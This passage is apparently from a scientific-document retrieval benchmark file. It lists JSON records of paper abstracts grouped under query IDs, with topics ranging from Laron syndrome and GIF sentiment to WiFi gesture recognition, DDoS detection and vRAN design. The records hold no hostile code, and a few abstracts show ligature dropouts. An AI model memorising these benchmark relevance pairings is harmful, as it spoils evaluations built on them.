"text": "In 1966 our group reported three siblings with clinical and biochemical features of GH deficiency but who had high serum GH levels [1] in the range of active acromegaly. Within 2 years we were able to collect 22 patients [4] all Oriental Jews. The first hypothesis that the defect is due to an abnormal GH molecule was disproved by finding that the circulating GH of these patients is normal by immunologic [5,6] and radioreceptor tests using GH receptors (GH-R) prepared from human liver membranes [7,8]. Growth hormone insensitivity was diagnosed by the low serum levels of insulin-like growth factor I (IGF-I) (at that time called somatomedin-C) in the presence of high endogenous GH levels and by the inability to generate IGF-I by the administration of exogenous hGH [9,10]. The cause of the GH resistance was also demonstrated by our group in 1984 by showing that GH-R prepared from liver membranes obtained by biopsies from two patients with LS did not bind radio-labelled human GH [11]. The subsequent cloning by Leung et al., of the GH-R [12], its characterization by Godowski et al. of the GH-R [13] and the introduction of new techniques in molecular biology enabled the localization of the molecular defects of the GH receptor gene. Geographical distribution and genetic aspects Since the first description of patients with LS in Israel of Oriental Jewish origin (Yemen, Iran, Afghanistan, Middle East and North Africa [1,4,14], more and more patients have been diagnosed both in our and other countries, the majority originating in the Mediterranean area, of North African, Spanish or Italian origin and Middle East of Jewish, Arab, Turkish, Iranian or Pakistani origin or in descendants of subjects originating from these regions. A large genetic isolate has been reported from Ecuador [15] suspected to have originated from Jewish conversos fleeing the Spanish Inquisition, and a smaller one in the Bahamas [16]. There are also numerous patients in Turkey [17], Pakistan and India [18,19]. In most of the above populations consanguinity was or is still in practice. Isolated patients not of Mediterranean or Oriental descent have been reported from Denmark, The Netherlands, Slovakia, Russia, Slovenia, Japan and the USA. A more detailed listing appears in recent reviews of this syndrome [20–22]. At present many hundreds of patients have been diagnosed and the number increases constantly. Analysis of the Israeli cohort led to the conclusion that Laron syndrome is caused by an autosomal fully penetrant recessive mechanism [23].",
"title": ""
},
{
"docid": "2b3de55ff1733fac5ee8c22af210658a",
"text": "With faster connection speed, Internet users are now making social network a huge reservoir of texts, images and video clips (GIF). Sentiment analysis for such online platform can be used to predict political elections, evaluates economic indicators and so on. However, GIF sentiment analysis is quite challenging, not only because it hinges on spatio-temporal visual contentabstraction, but also for the relationship between such abstraction and final sentiment remains unknown.In this paper, we dedicated to find outsuch relationship.We proposed a SentiPairSequence basedspatiotemporal visual sentiment ontology, which forms the midlevel representations for GIFsentiment. The establishment process of SentiPair contains two steps. First, we construct the Synset Forest to define the semantic tree structure of visual sentiment label elements. Then, through theSynset Forest, we organically select and combine sentiment label elements to form a mid-level visual sentiment representation. Our experiments indicate that SentiPair outperforms other competing mid-level attributes. Using SentiPair, our analysis frameworkcan achieve satisfying prediction accuracy (72.6%). We also opened ourdataset (GSO-2015) to the research community. GSO-2015 contains more than 6,000 manually annotated GIFs out of more than 40,000 candidates. Each is labeled with both sentiment and SentiPair Sequence.",
"title": ""
},
{
"docid": "aa749c00010e5391710738cc235c1c35",
"text": "Traditional summarization initiatives have been focused on specific types of documents such as articles, reviews, videos, image feeds, or tweets, a practice which may result in pigeonholing the summarization task in the context of modern, content-rich multimedia collections. Consequently, much of the research to date has revolved around mostly toy problems in narrow domains and working on single-source media types. We argue that summarization and story generation systems need to refocus the problem space in order to meet the information needs in the age of user-generated content in di↵erent formats and languages. Here we create a framework for flexible multimedia storytelling. Narratives, stories, and summaries carry a set of challenges in big data and dynamic multi-source media that give rise to new research in spatial-temporal representation, viewpoint generation, and explanation.",
"title": ""
},
{
"docid": "b51f3871cf5354c23e5ffd18881fe951",
"text": "As the Internet grows in importance, concerns about online privacy have arisen. We describe the development and validation of three short Internet-administered scales measuring privacy related attitudes ('Privacy Concern') and behaviors ('General Caution' and 'Technical Protection'). Internet Privacy Scales 1 In Press: Journal of the American Society for Information Science and Technology UNCORRECTED proofs. This is a preprint of an article accepted for publication in Journal of the American Society for Information Science and Technology copyright 2006 Wiley Periodicals, Inc. Running Head: INTERNET PRIVACY SCALES Development of measures of online privacy concern and protection for use on the",
"title": ""
},
{
"docid": "df5c5fbdb279644a43dee243f586bf78",
"text": "Previous research has usually assumed that shopping on-line is a goal-oriented activity and is motivated by extrinsic factors of the customers. On the other hand, intrinsic factors, such as entertainment, have been found to be a major reason for peoples to use the Internet. This study examined whether such intrinsic motivations can be used to explain consumers’ acceptance of on-line shopping. A theoretical model, based on the technology acceptance model, was proposed to describe the intrinsic and extrinsic motivations of consumers to shop on-line. Results of this empirical study showed that perceived usefulness is not an antecedent of on-line shopping, while fashion and a cognitive absorption experiences on the web were more important than their extrinsic factors in explaining on-line consuming behavior. Implications and limitations were discussed. # 2003 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "77502699d31b0bb13f6070756054fc2d",
"text": "This thesis evaluates the integrated information theory (IIT) by looking at how it may answer some central problems of consciousness that the author thinks any theory of consciousness should be able to explain. The problems concerned are the mind-body problem, the hard problem, the explanatory gap, the binding problem, and the problem of objectively detecting consciousness. The IIT is a computational theory of consciousness thought to explain the rise of consciousness. First the mongrel term consciousness is defined to give a clear idea of what is meant by consciousness in this thesis; followed by a presentation of the IIT, its origin, main ideas, and some implications of the theory. Thereafter the problems of consciousness will be presented, and the explanation the IIT gives will be investigated. In the discussion, some not perviously—in the thesis—discussed issues regarding the theory will be lifted. The author finds the IIT to hold explanations to each of the problems discussed. Whether the explanations are satisfying is questionable. Keywords: integrated information theory, phenomenal consciousness, subjective experience, mind-body, the hard problem, binding, testing
AN EVALUATION OF THE IIT !4 Table of Content Introduction 5 Defining Consciousness 6 Introduction to the Integrated Information Theory 8 Historical Background 8 The Approach 9 The Core of the IIT 9 Axioms 11 Postulates 13 The Conscious Mechanism of the IIT 15 Some Key Terms of the IIT 17 The Central Identity of the IIT 19 Some Implications of the IIT 20 Introduction to the Problems of Consciousness 25 The Mind-Body Problem 25 The Hard Problem 27 The Explanatory Gap 28 The Problem With the Problems Above 28 The Binding Problem 30 The Problem of Objectively Detecting Consciousness 31 Evaluation of the IIT Against the Problems of Consciousness 37 The Mind-Body Problem vs. the IIT 38 The Hard Problem vs. the IIT 40 The Explanatory Gap vs. the IIT 42 The Binding Problem vs. the IIT 43 The Problem of Objectively Detecting Consciousness 45 Discussion 50 Conclusion 53 References 54 AN EVALUATION OF THE IIT !5 Introduction Intuitively we like to believe that things which act and behave similarly to ourselves are conscious, things that interact with us on our terms, mimic our facial and bodily expressions, and those that we feel empathy for. But what about things that are superficially different from us, such as other animals and insects, bacteria, groups of people, humanoid robots, the Internet, self-driving cars, smartphones, or grey boxes which show no signs of interaction with their environment? Is it possible that intuition and theory of mind (ToM) may be misleading; that one wrongly associate consciousness with intelligence, human-like behaviour, and ability to react on stimuli? Perhaps we attribute consciousness to things that are not conscious, and that we miss to attribute it to things that really have vivid experiences. To address this question, many theories have been proposed that aim at explaining the emergence of consciousness and to give us tools to identify wherever consciousness may occur. The integrated information theory (IIT) (Tononi, 2004), is one of them. It originates in the dynamic core theory (Tononi & Edelman, 1998) and claims that consciousness is the same as integrated information. While some theories of consciousness only attempt to explain consciousness in neurobiological systems, the IIT is assumed to apply to non-biological systems. Parthemore and Whitby (2014) raise the concern that one may be tempted to reduce consciousness to some quantity X, where X might be e.g. integrated information, neural oscillations (the 40 Hz theory, Crick & Koch, 1990), etc. A system that models one of those theories may prematurely be believed to be conscious argue Parthemore and Whitby (2014). This tendency has been noted among researchers of machine consciousness, of some who have claimed their systems to have achieved at least minimal consciousness (Gamez, 2008a). The aim of this thesis is to take a closer look at the IIT and see how it responds to some of the major problems of consciousness. The focus will be on the mechanisms which AN EVALUATION OF THE IIT !6 the IIT hypothesises gives rise to conscious experience (Oizumi, Albantakis, & Tononi, 2014a), and how it corresponds to those identified by cognitive neurosciences. This thesis begins by offering a working definition of consciousness; that gives a starting point for what we are dealing with. Then it continues with an introduction to the IIT, which is the main focus of this thesis. I have tried to describe the theory in my own words, where some of more complex details not necessary for my argument are left out. 
I have taken some liberties in adapting the terminology to fit better with what I find elsewhere in cognitive neurosciences and consciousness science avoiding distorting the theory. Thereafter follows the problems of consciousness, which a theory of consciousness, such as IIT, should be able to explain. The problems explored in this thesis are the mind-body problem, the hard problem, the explanatory gap, the binding problem and the problem of objectively detecting consciousness. Each problem is used to evaluate the theory by looking at what explanations the theory is providing. Defining Consciousness What is this thing that is called consciousness and what does it mean to be conscious? Science doesn’t seem to provide with one clear definition of consciousness (Cotterill, 2003; Gardelle & Kouider, 2009; Revonsuo, 2010). When lay people talk about consciousness and being conscious they commonly refer to being attentive and aware and having intentions (Malle, 2009). Both John Searle (1990) and Giulio Tononi (Tononi, 2008, 2012a; Oizumi et al., 2014a) refer to consciousness as the thing that disappears when falling into dreamless sleep, or otherwise become unconscious, and reappears when we wake up or begin to dream. The problem with defining the term consciousness is that it seems to point to many different kinds of phenomena (Block, 1995). In an attempt to point it out and pin it down, the AN EVALUATION OF THE IIT !7 usage of the term needs to be narrowed down to fit the intended purpose. Cognition and neuroscientists alike commonly use terms such as non-conscious, unconscious, awake state, lucid dreaming, etc. which all refer to the subjective experience, but of different degrees, levels, and states (Revonsuo, 2009). Commonly used in discussions regarding consciousness are also terms such as reflective consciousness, self-consciousness, access consciousness, and functional consciousness. Those terms have little to do with the subjective experience per se, at best they describe some of the content of an experience, but mostly refer to observed behaviour (Block, 1995). It seems that researchers of artificial machine consciousness often steer away from the subjective experience. Instead, they focus on the use, the functions, and the expressions of consciousness, as it may be perceived by a third person (Gamez, 2008a). In this thesis, the term consciousness is used for the phenomenon of subjective experience, per se. It is what e.g. differs the awake state from dreamless sleep. It is what differs one’s own conscious thought processes from a regular computer’s nonconscious information processing, or one’s mindful thought from unconscious sensory-motoric control and automatic responses. It is what is lost during anaesthesia and epileptic seizures. Without consciousness, there wouldn’t be “something it is like to be” (Nagel, 1974, p. 436) and there would be no one there to experience the world (Tononi, 2008). Without it we would not experience anything. We would not even regard ourselves to be alive. It is the felt raw experience, even before it is attended to, considered and possible to report, i.e. what Block (1995) refers to as phenomenal consciousness. This is also often the starting point of cognitive and neurological theories of consciousness, which try to explain how experience emerge within the brain by exploring the differences between conscious and nonconscious states and processes. 
AN EVALUATION OF THE IIT !8 Introduction to the Integrated Information Theory Integrated information measures how much can be distinguished by the whole above and beyond its parts, and Φ is its symbol. A complex is where Φ reaches its maximum, and therein lives one consciousness—a single entity of experience. (Tononi, 2012b, p. 172) Historical Background The integrated information theory originates in the collected ideas of Tononi, Sporns, and Edelman (1992, 1994). In their early collaborative work, they developed a reentering model of visual binding which considered cortico-cortical connections as the basis for integration (Tononi et al., 1992). Two years later they presented a measure hypothesised to describe the neural complexity of functional integration in the brain (Tononi et al., 1994). The ideas of the reentering model and neural complexity measure developed into the more known dynamic core hypothesis (DCH) of the neural substrate of consciousness (Tononi & Edelman, 1998). The thalamocortical pathways played the foundation of sensory modality integration. In the DCH, a measure of integration based on entropy was introduced, which later became Φ, the measurement of integrated information (Tononi & Sporns, 2003). This laid the foundation for the information integration theory of consciousness (Tononi, 2004). The IIT is under constant development and has since it first was presented undergone three major revisions. The latest, at the time of writing, is referred to as version 3.0 (Oizumi et al., 2014a), which this thesis mostly relies on. The basic philosophical and theoretical assumptions have been preserved throughout the development of the theory. Some of the terminology and mathematics have changed between the versions (Oizumi, Amari, Yanagawa, Fujii, & Tsuchiya, 2015). Axioms and p",
"title": ""
},
{
"docid": "69624e1501b897bf1a9f9a5a84132da3",
"text": "360° videos and Head-Mounted Displays (HMDs) are geing increasingly popular. However, streaming 360° videos to HMDs is challenging. is is because only video content in viewers’ Fieldof-Views (FoVs) is rendered, and thus sending complete 360° videos wastes resources, including network bandwidth, storage space, and processing power. Optimizing the 360° video streaming to HMDs is, however, highly data and viewer dependent, and thus dictates real datasets. However, to our best knowledge, such datasets are not available in the literature. In this paper, we present our datasets of both content data (such as image saliency maps and motion maps derived from 360° videos) and sensor data (such as viewer head positions and orientations derived from HMD sensors). We put extra eorts to align the content and sensor data using the timestamps in the raw log les. e resulting datasets can be used by researchers, engineers, and hobbyists to either optimize existing 360° video streaming applications (like rate-distortion optimization) and novel applications (like crowd-driven cameramovements). We believe that our dataset will stimulate more research activities along this exciting new research direction. ACM Reference format: Wen-Chih Lo, Ching-Ling Fan, Jean Lee, Chun-Ying Huang, Kuan-Ta Chen, and Cheng-Hsin Hsu. 2017. 360° Video Viewing Dataset in Head-Mounted Virtual Reality. In Proceedings ofMMSys’17, Taipei, Taiwan, June 20-23, 2017, 6 pages. DOI: hp://dx.doi.org/10.1145/3083187.3083219 CCS Concept • Information systems→Multimedia streaming",
"title": ""
},
{
"docid": "7660ad596801203d1c9d1635be6b90d9",
"text": "a r t i c l e i n f o This study investigates the role of dynamic capabilities in the resource-based view framework, and also explores the relationships among different resources, different dynamic capabilities and firm performance. Employing samples of top 1000 Taiwanese companies, the findings show that dynamic capabilities can mediate the firm's valuable, rare, inimitable and non-substitutable (VRIN) resources to improve performance. On the contrary, non-VRIN resources have an insignificant mediating effect. Among three types of dynamic capabilities, dynamic learning capability most effectively mediates the influence of VRIN resources on performance. Furthermore, the important role of VRIN resources is addressed because of their direct effects on performance based on RBV, as well as their indirect effect via the mediation of dynamic capabilities.",
"title": ""
},
{
"docid": "d8da6bebb1ca8f00b176e1493ded4b9c",
"text": "This paper presents an efficient technique for the evaluation of different types of losses in substrate integrated waveguide (SIW). This technique is based on the Boundary Integral-Resonant Mode Expansion (BI-RME) method in conjunction with a perturbation approach. This method also permits to derive automatically multimodal and parametric equivalent circuit models of SIW discontinuities, which can be adopted for an efficient design of complex SIW circuits. Moreover, a comparison of losses in different types of planar interconnects (SIW, microstrip, coplanar waveguide) is presented.",
"title": ""
},
{
"docid": "f29342c97fadce870036a9393c8d9872",
"text": "It has become a popular trend in using metallic housing for mobile phone. The metallic housing often posts a great challenge towards the design of internal antenna which is used commonly in mobile devices. As such, it has become a common practice that most will integrate the metallic housing as part of the antenna for the mobile phone. This paper presents an antenna solution for mobile phone with a metallic back cover. The antenna solution is for the Main Antenna operating at several frequency bands in the range of 700–960MHz, 1710–2170MHz, 2300–2400MHz as well as 2500–2690MHz, which cover the GSM850, GSM900, DCS1800, PCS1900, WCDMA2100, and various LTE Bands in the 4G cellular network. The antenna solution presented in this paper, demonstrates the use of tunable component, integrating with the metallic housing to provide flexible tuning to cover the various frequency spectrums in the 2G, 3G and 4G cellular network.",
"title": ""
},
{
"docid": "7a033c2bedf107dfbd92887eaa4ae8c0",
"text": "Building high-performance virtual machines is a complex and expensive undertaking; many popular languages still have low-performance implementations. We describe a new approach to virtual machine (VM) construction that amortizes much of the effort in initial construction by allowing new languages to be implemented with modest additional effort. The approach relies on abstract syntax tree (AST) interpretation where a node can rewrite itself to a more specialized or more general node, together with an optimizing compiler that exploits the structure of the interpreter. The compiler uses speculative assumptions and deoptimization in order to produce efficient machine code. Our initial experience suggests that high performance is attainable while preserving a modular and layered architecture, and that new high-performance language implementations can be obtained by writing little more than a stylized interpreter.",
"title": ""
}
] | scidocsrr |
37b1c6988b75cc79fd233a31ee8be06f | WiGest: A ubiquitous WiFi-based gesture recognition system | [
{
"docid": "3f1967d87d14a1ee652760929ed217d0",
"text": "Existing location-based social networks (LBSNs), e.g. Foursquare, depend mainly on GPS or network-based localization to infer users' locations. However, GPS is unavailable indoors and network-based localization provides coarse-grained accuracy. This limits the accuracy of current LBSNs in indoor environments, where people spend 89% of their time. This in turn affects the user experience, in terms of the accuracy of the ranked list of venues, especially for the small-screens of mobile devices; misses business opportunities; and leads to reduced venues coverage.\n In this paper, we present CheckInside: a system that can provide a fine-grained indoor location-based social network. CheckInside leverages the crowd-sensed data collected from users' mobile devices during the check-in operation and knowledge extracted from current LBSNs to associate a place with its name and semantic fingerprint. This semantic fingerprint is used to obtain a more accurate list of nearby places as well as automatically detect new places with similar signatures. A novel algorithm for handling incorrect check-ins and inferring a semantically-enriched floorplan is proposed as well as an algorithm for enhancing the system performance based on the user implicit feedback.\n Evaluation of CheckInside in four malls over the course of six weeks with 20 participants shows that it can provide the actual user location within the top five venues 99% of the time. This is compared to 17% only in the case of current LBSNs. In addition, it can increase the coverage of current LBSNs by more than 25%.",
"title": ""
},
{
"docid": "21dd7b4582f71d678b5592a547d9e730",
"text": "The existence of a worldwide indoor floorplans database can lead to significant growth in location-based applications, especially for indoor environments. In this paper, we present CrowdInside: a crowdsourcing-based system for the automatic construction of buildings floorplans. CrowdInside leverages the smart phones sensors that are ubiquitously available with humans who use a building to automatically and transparently construct accurate motion traces. These accurate traces are generated based on a novel technique for reducing the errors in the inertial motion traces by using the points of interest in the indoor environment, such as elevators and stairs, for error resetting. The collected traces are then processed to detect the overall floorplan shape as well as higher level semantics such as detecting rooms and corridors shapes along with a variety of points of interest in the environment.\n Implementation of the system in two testbeds, using different Android phones, shows that CrowdInside can detect the points of interest accurately with 0.2% false positive rate and 1.3% false negative rate. In addition, the proposed error resetting technique leads to more than 12 times enhancement in the median distance error compared to the state-of-the-art. Moreover, the detailed floorplan can be accurately estimated with a relatively small number of traces. This number is amortized over the number of users of the building. We also discuss possible extensions to CrowdInside for inferring even higher level semantics about the discovered floorplans.",
"title": ""
}
] | [
{
"docid": "6bb1914cbbaf0ba27a8ab52dbec2152a",
"text": "This paper presents a novel local feature for 3D range image data called `the line image'. It is designed to be highly viewpoint invariant by exploiting the range image to efficiently detect 3D occupancy, producing a representation of the surface, occlusions and empty spaces. We also propose a strategy for defining keypoints with stable orientations which define regions of interest in the scan for feature computation. The feature is applied to the task of object classification on sparse urban data taken with a Velodyne laser scanner, producing good results.",
"title": ""
},
{
"docid": "effa64c878add2a55a804415cb7c8169",
"text": "Dimensionality reduction is an important issue in many machine learning and pattern recognition applications, and the trace ratio (TR) problem is an optimization problem involved in many dimensionality reduction algorithms. Conventionally, the solution is approximated via generalized eigenvalue decomposition due to the difficulty of the original problem. However, prior works have indicated that it is more reasonable to solve it directly than via the conventional way. In this brief, we propose a theoretical overview of the global optimum solution to the TR problem via the equivalent trace difference problem. Eigenvalue perturbation theory is introduced to derive an efficient algorithm based on the Newton-Raphson method. Theoretical issues on the convergence and efficiency of our algorithm compared with prior literature are proposed, and are further supported by extensive empirical results.",
"title": ""
},
{
"docid": "7912241009e05de6af4e41aa2f48a1ec",
"text": "CONTEXT/OBJECTIVE\nNot much is known about the implication of adipokines and different cytokines in gestational diabetes mellitus (GDM) and macrosomia. The purpose of this study was to assess the profile of these hormones and cytokines in macrosomic babies, born to gestational diabetic women.\n\n\nDESIGN/SUBJECTS\nA total of 59 women (age, 19-42 yr) suffering from GDM with their macrosomic babies (4.35 +/- 0.06 kg) and 60 healthy age-matched pregnant women and their newborns (3.22 +/- 0.08 kg) were selected.\n\n\nMETHODS\nSerum adipokines (adiponectin and leptin) were quantified using an obesity-related multiple ELISA microarray kit. The concentrations of serum cytokines were determined by ELISA.\n\n\nRESULTS\nSerum adiponectin levels were decreased, whereas the concentrations of leptin, inflammatory cytokines, such as IL-6 and TNF-alpha, were significantly increased in gestational diabetic mothers compared with control women. The levels of these adipocytokines were diminished in macrosomic babies in comparison with their age-matched control newborns. Serum concentrations of T helper type 1 (Th1) cytokines (IL-2 and interferon-gamma) were decreased, whereas IL-10 levels were significantly enhanced in gestational diabetic mothers compared with control women. Macrosomic children exhibited high levels of Th1 cytokines and low levels of IL-10 compared with control infants. Serum IL-4 levels were not altered between gestational diabetic mothers and control mothers or the macrosomic babies and newborn control babies.\n\n\nCONCLUSIONS\nGDM is linked to the down-regulation of adiponectin along with Th1 cytokines and up-regulation of leptin and inflammatory cytokines. Macrosomia was associated with the up-regulation of Th1 cytokines and the down-regulation of the obesity-related agents (IL-6 and TNF-alpha, leptin, and adiponectin).",
"title": ""
},
{
"docid": "7678163641a37a02474bd42a48acec16",
"text": "Thiopurine S-methyltransferase (TPMT) is involved in the metabolism of thiopurine drugs. Patients that due to genetic variation lack this enzyme or have lower levels than normal, can be adversely affected if normal doses of thiopurines are prescribed. The evidence for measuring TPMT prior to starting patients on thiopurine drug therapy has been reviewed and the various approaches to establishing a service considered. Until recently clinical guidelines on the use of the TPMT varied by medical specialty. This has now changed, with clear guidance encouraging clinicians to use the TPMT test prior to starting any patient on thiopurine therapy. The TPMT test is the first pharmacogenomic test that has crossed from research to routine use. Several analytical approaches can be taken to assess TPMT status. The use of phenotyping supported with genotyping on selected samples has emerged as the analytical model that has enabled national referral services to be developed to a high level in the UK. The National Health Service now has access to cost-effective and timely TPMT assay services, with two laboratories undertaking the majority of the work at national level and with several local services developing. There appears to be adequate capacity and an appropriate internal market to ensure that TPMT assay services are commensurate with the clinical demand.",
"title": ""
},
{
"docid": "901fa78a4d06c365d13169859caeae69",
"text": "Although the number of cloud projects has dramatically increased over the last few years, ensuring the availability and security of project data, services, and resources is still a crucial and challenging research issue. Distributed denial of service (DDoS) attacks are the second most prevalent cybercrime attacks after information theft. DDoS TCP flood attacks can exhaust the cloud’s resources, consume most of its bandwidth, and damage an entire cloud project within a short period of time. The timely detection and prevention of such attacks in cloud projects are therefore vital, especially for eHealth clouds. In this paper, we present a new classifier system for detecting and preventing DDoS TCP flood attacks (CS_DDoS) in public clouds. The proposed CS_DDoS system offers a solution to securing stored records by classifying the incoming packets and making a decision based on the classification results. During the detection phase, the CS_DDOS identifies and determines whether a packet is normal or originates from an attacker. During the prevention phase, packets, which are classified as malicious, will be denied to access the cloud service and the source IP will be blacklisted. The performance of the CS_DDoS system is compared using the different classifiers of the least squares support vector machine (LS-SVM), naïve Bayes, K-nearest, and multilayer perceptron. The results show that CS_DDoS yields the best performance when the LS-SVM classifier is adopted. It can detect DDoS TCP flood attacks with about 97% accuracy and with a Kappa coefficient of 0.89 when under attack from a single source, and 94% accuracy with a Kappa coefficient of 0.9 when under attack from multiple attackers. Finally, the results are discussed in terms of accuracy and time complexity, and validated using a K-fold cross-validation model.",
"title": ""
},
{
"docid": "82592f60e0039089e3c16d9534780ad5",
"text": "A model for grey-tone image enhancement using the concept of fuzzy sets is suggested. It involves primary enhancement, smoothing, and then final enhancement. The algorithm for both the primary and final enhancements includes the extraction of fuzzy properties corresponding to pixels and then successive applications of the fuzzy operator \"contrast intensifier\" on the property plane. The three different smoothing techniques considered in the experiment are defocussing, averaging, and max-min rule over the neighbors of a pixel. The reduction of the \"index of fuzziness\" and \"entropy\" for different enhanced outputs (corresponding to different values of fuzzifiers) is demonstrated for an English script input. Enhanced output as obtained by histogram modification technique is also presented for comparison.",
"title": ""
},
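A minimal sketch of the "contrast intensifier" step described above, assuming the common S-type membership function and a simple inverse transform. The fuzzifier values (fd, fe), the number of INT passes, and the clipping are illustrative choices rather than the paper's exact settings, and the smoothing stage is omitted.

```python
import numpy as np

def intensify(mu):
    """Fuzzy 'contrast intensifier' (INT) operator applied to a membership plane."""
    return np.where(mu <= 0.5, 2.0 * mu ** 2, 1.0 - 2.0 * (1.0 - mu) ** 2)

def fuzzy_enhance(img, fd=60.0, fe=2.0, passes=1):
    """Gray image -> fuzzy property plane -> INT pass(es) -> back to gray levels."""
    img = img.astype(float)
    xmax = img.max()
    mu = (1.0 + (xmax - img) / fd) ** (-fe)          # extract fuzzy 'brightness' properties
    for _ in range(passes):                           # successive contrast intensification
        mu = intensify(mu)
    out = xmax - fd * (mu ** (-1.0 / fe) - 1.0)       # inverse transform to the gray plane
    return np.clip(out, 0, xmax)                      # memberships pushed toward 0 map to black

demo = np.array([[40, 120], [180, 250]], dtype=float)
print(np.round(fuzzy_enhance(demo), 1))
```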
{
"docid": "32bb1110b3f30617e8a29a346c893e56",
"text": "Article history: Available online 3 May 2016",
"title": ""
},
{
"docid": "f554af0d260de70f6efbc8fe8d64a357",
"text": "Hypocretin deficiency causes narcolepsy and may affect neuroendocrine systems and body composition. Additionally, growth hormone (GH) alterations my influence weight in narcolepsy. Symptoms can be treated effectively with sodium oxybate (SXB; γ-hydroxybutyrate) in many patients. This study compared growth hormone secretion in patients and matched controls and established the effect of SXB administration on GH and sleep in both groups. Eight male hypocretin-deficient patients with narcolepsy and cataplexy and eight controls matched for sex, age, BMI, waist-to-hip ratio, and fat percentage were enrolled. Blood was sampled before and on the 5th day of SXB administration. SXB was taken two times 3 g/night for 5 consecutive nights. Both groups underwent 24-h blood sampling at 10-min intervals for measurement of GH concentrations. The GH concentration time series were analyzed with AutoDecon and approximate entropy (ApEn). Basal and pulsatile GH secretion, pulse regularity, and frequency, as well as ApEn values, were similar in patients and controls. Administration of SXB caused a significant increase in total 24-h GH secretion rate in narcolepsy patients, but not in controls. After SXB, slow-wave sleep (SWS) and, importantly, the cross-correlation between GH levels and SWS more than doubled in both groups. In conclusion, SXB leads to a consistent increase in nocturnal GH secretion and strengthens the temporal relation between GH secretion and SWS. These data suggest that SXB may alter somatotropic tone in addition to its consolidating effect on nighttime sleep in narcolepsy. This could explain the suggested nonsleep effects of SXB, including body weight reduction.",
"title": ""
},
{
"docid": "5284157f83c2fe578746b9ae3f6ad429",
"text": "SLOWbot is a research project conducted via a collaboration between iaso health and FBK (Fondazione Bruno Kessler). There are now thousands of available healthy aging apps, but most don't deliver on their promise to support a healthy aging process in people that need it the most. The neediest include the over-fifties age group, particularly those wanting to prevent the diseases of aging or whom already have a chronic disease. Even the motivated \"quantified selfers\" discard their health apps after only a few months. Our research aims to identify new ways to ensure adherence to a healthy lifestyle program tailored for an over fifties audience which is delivered by a chatbot. The research covers the participant onboarding process and examines barriers and issues with gathering predictive data that might inform future improved uptake and adherence as well as an increase in health literacy by the participants. The healthy lifestyle program will ultimately be delivered by our \"SLOWbot\" which guides the participant to make informed and enhanced health decision making, specifically around food choices (a \"longevity eating plan\").",
"title": ""
},
{
"docid": "097c9810e636b9cc3ec274ef6c30333d",
"text": "Emotion Recognition has expanding significance in helping human-PC collaboration issues. It is a difficult task to understand how other people feel but it becomes even worse to perceive these emotions through a computer. With the advancement in technology and increase in application of artificial intelligence, it has become a necessity to automatically recognize the emotions of the user for the human-computer interactions. The need for emotion recognition keeps increasing and it has become applicable in various fields now days. This paper explores the way to recognize different human emotions from our body through wireless signals.",
"title": ""
},
{
"docid": "bdbbe079493bbfec7fb3cb577c926997",
"text": "A large amount of information on the Web is contained in regularly structured objects, which we call data records. Such data records are important because they often present the essential information of their host pages, e.g., lists of products or services. It is useful to mine such data records in order to extract information from them to provide value-added services. Existing automatic techniques are not satisfactory because of their poor accuracies. In this paper, we propose a more effective technique to perform the task. The technique is based on two observations about data records on the Web and a string matching algorithm. The proposed technique is able to mine both contiguous and non-contiguous data records. Our experimental results show that the proposed technique outperforms existing techniques substantially.",
"title": ""
},
{
"docid": "c4e739d4307ef69b39fe9bc588b254c2",
"text": "Virtualized Radio Access Network (vRAN) architectures constitute a promising solution for the densification needs of 5G networks, as they decouple Base Stations (BUs) functions from Radio Units (RUs) allowing the processing power to be pooled at cost-efficient Central Units (CUs). vRAN facilitates the flexible function relocation (split selection), and therefore enables splits with less stringent network requirements compared to state-of-the-art fully Centralized (C-RAN) systems. In this paper, we study the important and challenging vRAN design problem. We propose a novel modeling approach and a rigorous analytical framework, FluidRAN, that minimizes RAN costs by jointly selecting the splits and the RUs-CUs routing paths. We also consider the increasingly relevant scenario where the RAN needs to support multi-access edge computing (MEC) services, that naturally favor distributed RAN (D-RAN) architectures. Our framework provides a joint vRAN/MEC solution that minimizes operational costs while satisfying the MEC needs. We follow a data-driven evaluation method, using topologies of 3 operational networks. Our results reveal that (i) pure C-RAN is rarely a feasible upgrade solution for existing infrastructure, (ii) FluidRAN achieves significant cost savings compared to D-RAN systems, and (iii) MEC can increase substantially the operator's cost as it pushes vRAN function placement back to RUs.",
"title": ""
},
{
"docid": "4610f713a43c291217a6a356518572bd",
"text": "Government and institutionally-driven reforms focused on quality teaching and learning in universities emphasize the importance of developing replicable, scalable teaching approaches that can be evaluated. In this context, learning design and learning analytics are two fields of research that may help university teachers design quality learning experiences for their students, evaluate how students are learning within that intended learning context and support personalized learning experiences for students. Learning Designs are ways of describing an educational experience such that it can be applied across a range of disciplinary contexts. Learning analytics offers new approaches to investigating the data associated with a learner's experience. This paper explores the relationship between learning designs and learning analytics.",
"title": ""
},
{
"docid": "e43ef4701689c1a8a03a6b2e391593bb",
"text": "Years of attraction research have established several \"principles\" of attraction with robust evidence. However, a major limitation of previous attraction studies is that they have almost exclusively relied on well-controlled experiments, which are often criticized for lacking ecological validity. The current research was designed to examine initial attraction in a real-life setting-speed-dating. Social Relations Model analyses demonstrated that initial attraction was a function of the actor, the partner, and the unique dyadic relationship between these two. Meta-analyses showed intriguing sex differences and similarities. Self characteristics better predicted women's attraction than they did for men, whereas partner characteristics predicted men's attraction far better than they did for women. The strongest predictor of attraction for both sexes was partners' physical attractiveness. Finally, there was some support for the reciprocity principle but no evidence for the similarity principle.",
"title": ""
},
{
"docid": "e4c3735b0f89fa35704a46204d79638f",
"text": "Recurrent Neural Networks (RNNs) have been widely used in natural language processing and computer vision. Among them, the Hierarchical Multi-scale RNN (HM-RNN), a kind of multi-scale hierarchical RNN proposed recently, can learn the hierarchical temporal structure from data automatically. In this paper, we extend the work to solve the computer vision task of action recognition. However, in sequence-to-sequence models like RNN, it is normally very hard to discover the relationships between inputs and outputs given static inputs. As a solution, attention mechanism could be applied to extract the relevant information from input thus facilitating the modeling of inputoutput relationships. Based on these considerations, we propose a novel attention network, namely Hierarchical Multi-scale Attention Network (HM-AN), by combining the HM-RNN and the attention mechanism and apply it to action recognition. A newly proposed gradient estimation method for stochastic neurons, namely Gumbel-softmax, is exploited to implement the temporal boundary detectors and the stochastic hard attention mechanism. To amealiate the negative effect of sensitive temperature of the Gumbel-softmax, an adaptive temperature training method is applied to better the system performance. The experimental results demonstrate the improved effect of HM-AN over LSTM with attention on the vision task. Through visualization of what have been learnt by the networks, it can be observed that both the attention regions of images and the hierarchical temporal structure can be captured by HM-AN.",
"title": ""
},
